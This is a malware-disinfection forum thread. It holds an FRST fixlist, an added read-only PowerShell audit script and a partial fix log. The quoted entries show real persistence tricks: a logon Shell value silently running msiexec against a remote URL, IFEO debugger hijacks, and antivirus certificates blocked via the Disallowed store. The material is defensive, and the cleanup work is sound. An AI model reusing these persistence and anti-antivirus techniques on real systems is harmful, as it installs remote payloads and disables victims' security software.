Need help with an infection

Disinfection help to remove viruses, adware, ransomware, trojans.

Moderators: Mods Windows, Helper

Corum
Posts: 4
Joined: 07 Sep 2017 14:03

Need help with an infection

Post by Corum » 08 Sep 2017 11:29

Hello, my PC is probably infected with lucky123 and other delights.

The symptoms are the following:

Cannot install AdwCleaner (because the PC decides that my administrator blocks this software, even though I am the administrator)
Cannot uninstall Chrome
Cannot set a browser as the default browser
Creation of a folder where a chrome.exe was placed automatically (in Program Files / Applemy), which I renamed Applemy2 in the hope of slowing the infection down...

Etc... etc...

So I read the posts on the forum from people who seem to have similar problems, and to save a bit of time I downloaded FRST
and followed the tutorial.

The scan is done.
The reports are here:
frst.txt : https://pjjoint.malekal.com/files.php?i ... k6k5u10x12
addition.txt : https://pjjoint.malekal.com/files.php?i ... z12d10k7y5
shortcut.txt : https://pjjoint.malekal.com/files.php?i ... q5y6u11j12

Now I think I need someone to help me with the next step and propose a fix script....

Thank you for your help, this problem is very disabling


Malekal_morte
Site Admin
Posts: 87572
Joined: 10 Sep 2005 13:57

Re: Need help with an infection

Post by Malekal_morte » 08 Sep 2017 11:50

Hi,

Yep, infected, and it must have been for a while, most likely after an infected crack.
On top of that you had the bad idea of installing Reimage Repair and YAC.

Go to Control Panel
then Programs and Features.
Uninstall:
AlphaGo
Reimage Repair
YAC(Yet Another Cleaner!)
then:

Here is the fix to perform with FRST. You can use this explanatory note with screenshots to help you.

Open Notepad: Windows key + R,
in the "Run" field, type notepad and OK.
Copy/paste the following into it:

Code:

CreateRestorePoint:
CloseProcesses:
C:\Program Files (x86)\MIO
Task: {201D921A-E3AD-46B5-B1C9-22DC70E81D3D} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-05-17] () <==== ATTENTION
Task: {6D903E65-0F9C-49F9-BE17-0F80A7DF8CBF} - System32\Tasks\ReimageUpdater => C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe [2017-08-15] (Reimage®) <==== ATTENTION
HKLM\ DisallowedCertificates: 03D22C9C66915D58C88912B64C1F984B8344EF09 (Comodo Security Solutions) <==== ATTENTION
HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (F-Secure Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: 1667908C9E22EFBD0590E088715CC74BE4C60884 (FRISK Software International/F-Prot) <==== ATTENTION
HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (Bitdefender SRL) <==== ATTENTION
HKLM\ DisallowedCertificates: 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF (G DATA Software AG) <==== ATTENTION
HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Malwarebytes Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF (Symantec Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Trend Micro) <==== ATTENTION
HKLM\ DisallowedCertificates: 3353EA609334A9F23A701B9159E30CB6C22D4C59 (Webroot Inc.) <==== ATTENTION
HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (SUPERAntiSpyware.com) <==== ATTENTION
HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Kaspersky Lab) <==== ATTENTION
HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (AVG Technologies CZ) <==== ATTENTION
HKLM\ DisallowedCertificates: 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 (PC Tools) <==== ATTENTION
HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (K7 Computing Pvt Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 4420C99742DF11DD0795BC15B7B0ABF090DC84DF (Doctor Web Ltd.) <==== ATTENTION
HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (Emsisoft Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 5240AB5B05D11B37900AC7712A3C6AE42F377C8C (Check Point Software Technologies Ltd.) <==== ATTENTION
HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Emsisoft Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 7457A3793086DBB58B3858D6476889E3311E550E (K7 Computing Pvt Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (BullGuard Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 775B373B33B9D15B58BC02B184704332B97C3CAF (McAfee) <==== ATTENTION
HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Comodo Security Solutions) <==== ATTENTION
HKLM\ DisallowedCertificates: 88AD5DFE24126872B33175D1778687B642323ACF (McAfee) <==== ATTENTION
HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Adaware Software) <==== ATTENTION
HKLM\ DisallowedCertificates: 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 (Safer Networking Ltd.) <==== ATTENTION
HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Webroot Inc.) <==== ATTENTION
HKLM\ DisallowedCertificates: 9C43F665E690AB4D486D4717B456C5554D4BCEB5 (ThreatTrack Security) <==== ATTENTION
HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avira Operations GmbH & Co. KG) <==== ATTENTION
HKLM\ DisallowedCertificates: A5341949ABE1407DD7BF7DFE75460D9608FBC309 (BullGuard Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (ESET) <==== ATTENTION
HKLM\ DisallowedCertificates: AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 (AVG Technologies CZ) <==== ATTENTION
HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) <==== ATTENTION
HKLM\ DisallowedCertificates: AD96BB64BA36379D2E354660780C2067B81DA2E0 (Symantec Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (Malwarebytes Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: CDC37C22FE9272D8F2610206AD397A45040326B8 (Trend Micro) <==== ATTENTION
HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Kaspersky Lab) <==== ATTENTION
HKLM\ DisallowedCertificates: DB303C9B61282DE525DC754A535CA2D6A9BD3D87 (ThreatTrack Security) <==== ATTENTION
HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software) <==== ATTENTION
HKLM\ DisallowedCertificates: E22240E837B52E691C71DF248F12D27F96441C00 (Total Defense, Inc.) <==== ATTENTION
HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (AVG Technologies CZ) <==== ATTENTION
HKLM\ DisallowedCertificates: ED841A61C0F76025598421BC1B00E24189E68D54 (Bitdefender SRL) <==== ATTENTION
HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (ESET) <==== ATTENTION
HKLM\ DisallowedCertificates: FBB42F089AF2D570F2BF6F493D107A3255A9BB1A (Panda Security S.L) <==== ATTENTION
HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Doctor Web Ltd.) <==== ATTENTION
HKU\S-1-5-21-1885968140-257581416-2244209593-1000\...\Run: [GoogleChromeAutoLaunch_CB883AFA019B4C7DB2A0EDE0EE48A17C] => C:\Program Files (x86)\Dayglad\Application\chrome.exe --no-startup-window /prefetch:5
HKU\S-1-5-21-1885968140-257581416-2244209593-1000\...\Run: [background_fault] => C:\Users\Yves\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-09] (AVAST Software) <==== ATTENTION
C:\Users\Yves\AppData\Local\background_fault
HKU\S-1-5-21-1885968140-257581416-2244209593-1000\...\Run: [GoogleChromeAutoLaunch_D86E271F0C07DE39109C5B55DCDECA36] => C:\Program Files (x86)\Footjane\Application\chrome.exe --no-startup-window /prefetch:5
HKU\S-1-5-21-1885968140-257581416-2244209593-1000\...\Run: [GoogleChromeAutoLaunch_941A751A450632976DD0BE07C090C392] => C:\Program Files (x86)\Applemy\Application\chrome.exe --no-startup-window /prefetch:5
HKU\S-1-5-21-1885968140-257581416-2244209593-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj1XRWU1MkJSNWhLNYNSRkF8MdqyNjZYRWLQFkJLN8FyFq== /q <==== ATTENTION [Pays US - 104.28.17.238]
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
ShellExecuteHooks: No Name - {790B50EC-2BBA-11E7-B94C-64006A5CFC23} - C:\Users\Yves\AppData\Roaming\Njtain\Qugtthine.dll [145920 2017-04-28] () <==== ATTENTION
S2 WinSAPSvc; C:\Users\Yves\AppData\Roaming\WinSAPSvc\WinSAP.dll [X] <==== ATTENTION
C:\Users\Yves\AppData\Roaming\Njtain
R1 iSafeKrnl; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [262344 2016-05-23] (Elex do Brasil Participações Ltda) <==== ATTENTION
R1 iSafeKrnlKit; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys [110112 2016-05-23] (Elex do Brasil Participações Ltda) <==== ATTENTION
R1 iSafeKrnlMon; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [52440 2016-05-23] (Elex do Brasil Participações Ltda) <==== ATTENTION
R1 iSafeKrnlR3; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys [103904 2016-05-23] (Elex do Brasil Participações Ltda) <==== ATTENTION
R1 iSafeNetFilter; C:\Windows\System32\DRIVERS\iSafeNetFilter.sys [52392 2016-05-19] (Elex do Brasil Participações Ltda) <==== ATTENTION
2017-09-06 17:36 - 2017-09-06 17:36 - 000004264 _____ C:\Windows\System32\Tasks\ReimageUpdater
2017-09-06 17:36 - 2017-09-06 17:36 - 000000000 ____D C:\ProgramData\Reimage Protector
2017-09-06 17:35 - 2017-09-06 17:37 - 000000000 ____D C:\rei
2017-09-06 17:35 - 2017-09-06 17:36 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Reimage Repair
2017-09-06 17:35 - 2017-09-06 17:36 - 000000000 ____D C:\Program Files\Reimage
2017-09-06 17:35 - 2017-09-06 17:35 - 000001943 _____ C:\Users\Public\Desktop\PC Scan & Repair by Reimage.lnk
2017-09-06 16:50 - 2017-09-06 16:50 - 001622528 _____ C:\Users\Yves\Downloads\ResetBrowser.exe
2017-09-06 16:15 - 2017-09-06 16:15 - 008182736 _____ (Malwarebytes) C:\Users\Yves\Desktop\adwcleaner_7.0.2.1.exe
2017-09-06 16:14 - 2017-09-06 17:37 - 000000150 _____ C:\Windows\Reimage.ini
2017-09-06 16:13 - 2017-09-06 16:13 - 000604928 _____ (Reimage) C:\Users\Yves\Downloads\ReimageRepair.exe
C:\Program Files (x86)\Elex-tech
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
Once the text is pasted into Notepad,
menu "File" then "Save As",
on the left, go to the Desktop,
in the field at the bottom, file name, enter: fixlist.txt
Click "Save"; this creates fixlist.txt on the Desktop.

Relaunch FRST and click the "Fix" button.
A reboot may be necessary (not mandatory).
A text file appears; copy/paste its contents here in a new message.

Reboot the computer


2) reset the browsers:
==================================
Reset your browsers and/or manually re-configure your web browsers (start page, search engine, etc.), and also remove/disable useless/parasitic extensions.
To help you with this clean-up, click below on the name of the web browser you use:
* Reset and repair Mozilla Firefox
* Reset and repair Google Chrome
* Reset and repair Internet Explorer
(Do not use Zeok)

3)
Do a clean-up with Malwarebytes Anti-Malware (MBAM) free version

4)
Redo an FRST scan and give the new reports via pjjoint
First basic rule of security: think first, then click, not the other way round - Files/programs are like sweets: when they come from a stranger, you do not accept them

Secure your computer (short version)

Software tutorials - Windows tutorial - Windows 10

Stop ads - intrusive popups
supprimer-trojan.com: malware removal guide

Share malekal.com: feel free to share the articles you like on Facebook and Google Plus.
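The fixlist above bundles four distinct techniques the infection used to stay alive and keep security tools off the machine: anti-virus vendors' code-signing certificates pushed into the machine-wide Disallowed store (consistent with Windows refusing the AdwCleaner installer with an "administrator blocked" message), an Image File Execution Options Debugger pointed at a file that does not exist so that GoogleUpdate.exe never starts, a Winlogon Shell policy that runs msiexec against a remote URL at every logon, and a ShellExecuteHook DLL under the user's roaming profile. The PowerShell script below, added here as an example and not part of the original post or of FRST, audits those locations read-only on a live machine from an elevated prompt; its function names, the vendor keyword list and the output format are this example's own choices, while the registry locations are the ones FRST reports.

```powershell
# Added example, not from the original thread or from FRST. Read-only audit of
# the persistence and anti-AV locations that the fixlist above targets, for a
# live Windows host. Run it from an elevated PowerShell 5.1 (or later) prompt.
# Function names, the vendor keyword list and the output format are this
# example's own choices; the registry locations are the ones FRST reports.

function Get-RegValues([string]$Path) {
    # Name/data pairs for every value under a key; nothing if the key is absent.
    if (-not (Test-Path -LiteralPath $Path)) { return }
    $key = Get-Item -LiteralPath $Path
    foreach ($name in $key.GetValueNames()) {
        [pscustomobject]@{ Name = $name; Data = $key.GetValue($name) }
    }
}

function Test-DisallowedCertificates {
    # Windows refuses to run code signed by a certificate that sits in the
    # machine Disallowed store, which is consistent with the "blocked by your
    # administrator" message the AdwCleaner installer produced. Vendor names are
    # those in the fixlist. A clean machine also carries a few Microsoft-pushed
    # revocations here, so treat every hit as a lead and read the subject first.
    $vendors = @('Malwarebytes', 'ESET', 'Kaspersky', 'Avast', 'AVG Technologies',
        'Bitdefender', 'Avira', 'Symantec', 'McAfee', 'Trend Micro', 'Comodo',
        'F-Secure', 'Emsisoft', 'Webroot', 'Panda Security', 'Doctor Web', 'G DATA',
        'K7 Computing', 'BullGuard', 'Check Point', 'Safer Networking',
        'SUPERAntiSpyware', 'ThreatTrack', 'Adaware', 'PC Tools', 'FRISK', 'Total Defense')
    foreach ($cert in Get-ChildItem Cert:\LocalMachine\Disallowed) {
        foreach ($v in $vendors) {
            if ($cert.Subject -match [regex]::Escape($v)) {
                "[DisallowedCert] $($cert.Thumbprint) $($cert.Subject)"
                break
            }
        }
    }
}

function Test-WinlogonShell {
    # A Shell value replaces explorer.exe at logon. The fixlist shows it chained
    # to "msiexec.exe /i http://... /q": a remote MSI installed at every logon.
    $paths = @('HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System',
        'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System')
    foreach ($p in $paths) {
        Get-RegValues $p | Where-Object { $_.Name -eq 'Shell' -and $_.Data -ne 'explorer.exe' } |
            ForEach-Object { "[WinlogonShell] $p Shell = $($_.Data)" }
    }
}

function Test-IfeoDebugger {
    # A Debugger value makes Windows start the "debugger" instead of the program.
    # Pointing it at a file that does not exist (324095823984.exe for
    # GoogleUpdate.exe in the fixlist) simply stops the target from ever running.
    $ifeo = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
    foreach ($key in Get-ChildItem $ifeo -ErrorAction SilentlyContinue) {
        $dbg = $key.GetValue('Debugger')
        if (-not $dbg) { continue }
        $exe = ("$dbg" -split ' ')[0].Trim('"')   # first token; good enough as a heuristic
        $note = if (Get-Command $exe -ErrorAction SilentlyContinue) { '' } else { ' (debugger not found on disk: target never starts)' }
        "[IFEO] $($key.PSChildName) Debugger = $dbg$note"
    }
}

function Test-RogueChromeAutoLaunch {
    # Google Chrome lives under ...\Google\Chrome\Application. The three
    # GoogleChromeAutoLaunch_* entries in the fixlist start chrome.exe copies
    # dropped in folders with generated names (Applemy, Dayglad, Footjane).
    foreach ($hive in 'HKLM', 'HKCU') {
        Get-RegValues "${hive}:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" |
            Where-Object { "$($_.Data)" -match 'chrome\.exe' -and "$($_.Data)" -notmatch '\\Google\\Chrome\\' } |
            ForEach-Object { "[Run] $hive $($_.Name) = $($_.Data)" }
    }
}

function Test-ShellExecuteHooks {
    # Each value name here is a CLSID whose in-process DLL is loaded by every
    # process that calls ShellExecute. A DLL under a user profile, like
    # Roaming\Njtain\Qugtthine.dll in the fixlist, has no business there.
    $hooks = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks'
    foreach ($hook in Get-RegValues $hooks) {
        $server = Get-RegValues "HKLM:\SOFTWARE\Classes\CLSID\$($hook.Name)\InprocServer32" |
            Where-Object { $_.Name -eq '' } | ForEach-Object { $_.Data }   # '' is the (Default) value
        $note = if ("$server" -match '\\Users\\') { ' (DLL under a user profile)' } else { '' }
        "[ShellExecuteHook] $($hook.Name) -> $server$note"
    }
}

$findings = @(
    Test-DisallowedCertificates
    Test-WinlogonShell
    Test-IfeoDebugger
    Test-RogueChromeAutoLaunch
    Test-ShellExecuteHooks
)
if ($findings.Count -eq 0) { 'No findings in the audited locations.' } else { $findings }
```

Each line of output names the location it came from, so a hit can be looked up directly in the FRST report before anything is deleted. The script never writes to the registry; removal stays with the FRST fix above, which also creates a restore point first.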

Corum
Posts: 4
Joined: 07 Sep 2017 14:03

Re: Need help with an infection

Post by Corum » 08 Sep 2017 12:30

First of all, a thousand thanks for your reply and your quick help.
I have just finished point 1.

So here, as requested, is the fix report:

Fix result of Farbar Recovery Scan Tool (x64) Version: 20-08-2017
Ran by Yves (08-09-2017 12:03:00) Run:1
Running from C:\Users\Yves\Desktop
Loaded Profiles: Yves (Available Profiles: Yves)
Boot Mode: Normal
==============================================

fixlist content:
*****************
CreateRestorePoint:
CloseProcesses:
C:\Program Files (x86)\MIO
Task: {201D921A-E3AD-46B5-B1C9-22DC70E81D3D} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-05-17] () <==== ATTENTION
Task: {6D903E65-0F9C-49F9-BE17-0F80A7DF8CBF} - System32\Tasks\ReimageUpdater => C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe [2017-08-15] (Reimage®) <==== ATTENTION
HKLM\ DisallowedCertificates: 03D22C9C66915D58C88912B64C1F984B8344EF09 (Comodo Security Solutions) <==== ATTENTION
HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (F-Secure Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: 1667908C9E22EFBD0590E088715CC74BE4C60884 (FRISK Software International/F-Prot) <==== ATTENTION
HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (Bitdefender SRL) <==== ATTENTION
HKLM\ DisallowedCertificates: 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF (G DATA Software AG) <==== ATTENTION
HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Malwarebytes Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF (Symantec Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Trend Micro) <==== ATTENTION
HKLM\ DisallowedCertificates: 3353EA609334A9F23A701B9159E30CB6C22D4C59 (Webroot Inc.) <==== ATTENTION
HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (SUPERAntiSpyware.com) <==== ATTENTION
HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Kaspersky Lab) <==== ATTENTION
HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (AVG Technologies CZ) <==== ATTENTION
HKLM\ DisallowedCertificates: 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 (PC Tools) <==== ATTENTION
HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (K7 Computing Pvt Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 4420C99742DF11DD0795BC15B7B0ABF090DC84DF (Doctor Web Ltd.) <==== ATTENTION
HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (Emsisoft Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 5240AB5B05D11B37900AC7712A3C6AE42F377C8C (Check Point Software Technologies Ltd.) <==== ATTENTION
HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Emsisoft Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 7457A3793086DBB58B3858D6476889E3311E550E (K7 Computing Pvt Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (BullGuard Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: 775B373B33B9D15B58BC02B184704332B97C3CAF (McAfee) <==== ATTENTION
HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Comodo Security Solutions) <==== ATTENTION
HKLM\ DisallowedCertificates: 88AD5DFE24126872B33175D1778687B642323ACF (McAfee) <==== ATTENTION
HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Adaware Software) <==== ATTENTION
HKLM\ DisallowedCertificates: 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 (Safer Networking Ltd.) <==== ATTENTION
HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Webroot Inc.) <==== ATTENTION
HKLM\ DisallowedCertificates: 9C43F665E690AB4D486D4717B456C5554D4BCEB5 (ThreatTrack Security) <==== ATTENTION
HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avira Operations GmbH & Co. KG) <==== ATTENTION
HKLM\ DisallowedCertificates: A5341949ABE1407DD7BF7DFE75460D9608FBC309 (BullGuard Ltd) <==== ATTENTION
HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (ESET) <==== ATTENTION
HKLM\ DisallowedCertificates: AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 (AVG Technologies CZ) <==== ATTENTION
HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) <==== ATTENTION
HKLM\ DisallowedCertificates: AD96BB64BA36379D2E354660780C2067B81DA2E0 (Symantec Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (Malwarebytes Corporation) <==== ATTENTION
HKLM\ DisallowedCertificates: CDC37C22FE9272D8F2610206AD397A45040326B8 (Trend Micro) <==== ATTENTION
HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Kaspersky Lab) <==== ATTENTION
HKLM\ DisallowedCertificates: DB303C9B61282DE525DC754A535CA2D6A9BD3D87 (ThreatTrack Security) <==== ATTENTION
HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software) <==== ATTENTION
HKLM\ DisallowedCertificates: E22240E837B52E691C71DF248F12D27F96441C00 (Total Defense, Inc.) <==== ATTENTION
HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (AVG Technologies CZ) <==== ATTENTION
HKLM\ DisallowedCertificates: ED841A61C0F76025598421BC1B00E24189E68D54 (Bitdefender SRL) <==== ATTENTION
HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (ESET) <==== ATTENTION
HKLM\ DisallowedCertificates: FBB42F089AF2D570F2BF6F493D107A3255A9BB1A (Panda Security S.L) <==== ATTENTION
HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Doctor Web Ltd.) <==== ATTENTION
HKU\S-1-5-21-1885968140-257581416-2244209593-1000\...\Run: [GoogleChromeAutoLaunch_CB883AFA019B4C7DB2A0EDE0EE48A17C] => C:\Program Files (x86)\Dayglad\Application\chrome.exe --no-startup-window /prefetch:5
HKU\S-1-5-21-1885968140-257581416-2244209593-1000\...\Run: [background_fault] => C:\Users\Yves\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-09] (AVAST Software) <==== ATTENTION
C:\Users\Yves\AppData\Local\background_fault
HKU\S-1-5-21-1885968140-257581416-2244209593-1000\...\Run: [GoogleChromeAutoLaunch_D86E271F0C07DE39109C5B55DCDECA36] => C:\Program Files (x86)\Footjane\Application\chrome.exe --no-startup-window /prefetch:5
HKU\S-1-5-21-1885968140-257581416-2244209593-1000\...\Run: [GoogleChromeAutoLaunch_941A751A450632976DD0BE07C090C392] => C:\Program Files (x86)\Applemy\Application\chrome.exe --no-startup-window /prefetch:5
HKU\S-1-5-21-1885968140-257581416-2244209593-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj1XRWU1MkJSNWhLNYNSRkF8MdqyNjZYRWLQFkJLN8FyFq== /q <==== ATTENTION [Pays US - 104.28.17.238]
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
ShellExecuteHooks: No Name - {790B50EC-2BBA-11E7-B94C-64006A5CFC23} - C:\Users\Yves\AppData\Roaming\Njtain\Qugtthine.dll [145920 2017-04-28] () <==== ATTENTION
S2 WinSAPSvc; C:\Users\Yves\AppData\Roaming\WinSAPSvc\WinSAP.dll [X] <==== ATTENTION
C:\Users\Yves\AppData\Roaming\Njtain
R1 iSafeKrnl; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [262344 2016-05-23] (Elex do Brasil Participações Ltda) <==== ATTENTION
R1 iSafeKrnlKit; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys [110112 2016-05-23] (Elex do Brasil Participações Ltda) <==== ATTENTION
R1 iSafeKrnlMon; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [52440 2016-05-23] (Elex do Brasil Participações Ltda) <==== ATTENTION
R1 iSafeKrnlR3; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys [103904 2016-05-23] (Elex do Brasil Participações Ltda) <==== ATTENTION
R1 iSafeNetFilter; C:\Windows\System32\DRIVERS\iSafeNetFilter.sys [52392 2016-05-19] (Elex do Brasil Participações Ltda) <==== ATTENTION
2017-09-06 17:36 - 2017-09-06 17:36 - 000004264 _____ C:\Windows\System32\Tasks\ReimageUpdater
2017-09-06 17:36 - 2017-09-06 17:36 - 000000000 ____D C:\ProgramData\Reimage Protector
2017-09-06 17:35 - 2017-09-06 17:37 - 000000000 ____D C:\rei
2017-09-06 17:35 - 2017-09-06 17:36 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Reimage Repair
2017-09-06 17:35 - 2017-09-06 17:36 - 000000000 ____D C:\Program Files\Reimage
2017-09-06 17:35 - 2017-09-06 17:35 - 000001943 _____ C:\Users\Public\Desktop\PC Scan & Repair by Reimage.lnk
2017-09-06 16:50 - 2017-09-06 16:50 - 001622528 _____ C:\Users\Yves\Downloads\ResetBrowser.exe
2017-09-06 16:15 - 2017-09-06 16:15 - 008182736 _____ (Malwarebytes) C:\Users\Yves\Desktop\adwcleaner_7.0.2.1.exe
2017-09-06 16:14 - 2017-09-06 17:37 - 000000150 _____ C:\Windows\Reimage.ini
2017-09-06 16:13 - 2017-09-06 16:13 - 000604928 _____ (Reimage) C:\Users\Yves\Downloads\ReimageRepair.exe
C:\Program Files (x86)\Elex-tech
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
*****************

Restore point was successfully created.
Processes closed successfully.
C:\Program Files (x86)\MIO => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{201D921A-E3AD-46B5-B1C9-22DC70E81D3D} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{201D921A-E3AD-46B5-B1C9-22DC70E81D3D} => key removed successfully
C:\Windows\System32\Tasks\Milimili => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Milimili => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6D903E65-0F9C-49F9-BE17-0F80A7DF8CBF} => key not found.
C:\Windows\System32\Tasks\ReimageUpdater => not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ReimageUpdater => key not found.
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\03D22C9C66915D58C88912B64C1F984B8344EF09 => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\0F684EC1163281085C6AF20528878103ACEFCAAB => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\1667908C9E22EFBD0590E088715CC74BE4C60884 => key removed successfully
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\18DEA4EFA93B06AE997D234411F3FD72A677EECE => key removed successfully
